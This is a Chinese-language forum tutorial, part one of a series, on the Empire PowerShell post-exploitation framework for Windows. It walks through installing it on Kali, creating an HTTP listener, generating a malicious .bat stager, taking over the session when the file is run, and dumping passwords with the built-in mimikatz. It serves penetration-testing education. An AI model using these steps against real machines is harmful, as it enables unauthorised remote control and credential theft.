Empire框架探索:从入门到深入理解(第一部分)

Empire是一个专为Windows平台设计的渗透测试攻击框架,采用PowerShell脚本作为攻击载荷。它具备生成stager进行提权和维持权限的功能,并支持无需powershell.exe即可运行PowerShell代理,还提供了多个后期漏洞利用模块,类似于Metasploit(简称msf)。

⚽ 在Kali Linux中安装 在Kali Linux中安装Empire非常简单,只需执行以下命令即可:

sudo apt install powershell-empire

图片[1]-Empire框架探索:从入门到深入理解(第一部分)-山海云端论坛

🎨 启动服务端 启动Empire PowerShell服务端与我们之前介绍过的CS类似,分为客户端和服务端。首先启动Empire PowerShell服务端:

powershell-empire server

图片[2]-Empire框架探索:从入门到深入理解(第一部分)-山海云端论坛

🎳 启动Empire PowerShell客户端

powershell-empire client

图片[3]-Empire框架探索:从入门到深入理解(第一部分)-山海云端论坛

📢 初试牛刀 Empire的使用方法与msf类似,首先设置监听,生成木马,然后监听反弹代理。输入Listeners进入监听页面,使用uselistener设置监听模式,共有7种模式:

  • dbx
  • http
  • http_foreign
  • http_hop
  • http_mapi
  • http_com
  • meterpreter

这里,我们以http模块为例:

uselistener http # 设置监听方式为http set Port 4321 # 设置端口 execute # 运行

图片[4]-Empire框架探索:从入门到深入理解(第一部分)-山海云端论坛

现在配置完监听模块,我们来看看如何生成shell。使用windows/launcher_bat模块生成恶意shell:

usestager windows/launcher_bat set Listener http # 设置监听方式 execute # 运行

执行完上述命令后,恶意文件已经生成。格式为bat。

图片[5]-Empire框架探索:从入门到深入理解(第一部分)-山海云端论坛

双击运行后,我们可以看到已成功获取会话。输入agents可以查看连接上的计算机的详细信息。

图片[6]-Empire框架探索:从入门到深入理解(第一部分)-山海云端论坛

🧩 连接设备 与msf类似,我们需要连接当前在线的设备。使用interact命令,加上设备名:

interact V1T86EUN

图片[7]-Empire框架探索:从入门到深入理解(第一部分)-山海云端论坛

运行help命令,可以查看具体的帮助文档。

由于命令较多,这里列举常用的一些命令:

图片[8]-Empire框架探索:从入门到深入理解(第一部分)-山海云端论坛
  • 进入系统cmd:shell
  • 使用内置的mimikatz抓取hash和密码:mimikatz
  • 设备详细信息:info
图片[9]-Empire框架探索:从入门到深入理解(第一部分)-山海云端论坛

可以看到,列出的信息还是比较全面的。

🎯 总结 Empire模块和msf一样,功能强大。虽然与msf相比配置略有不同,但后续文章中我们将重点更新!喜欢的小伙伴们欢迎点赞收藏!

© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容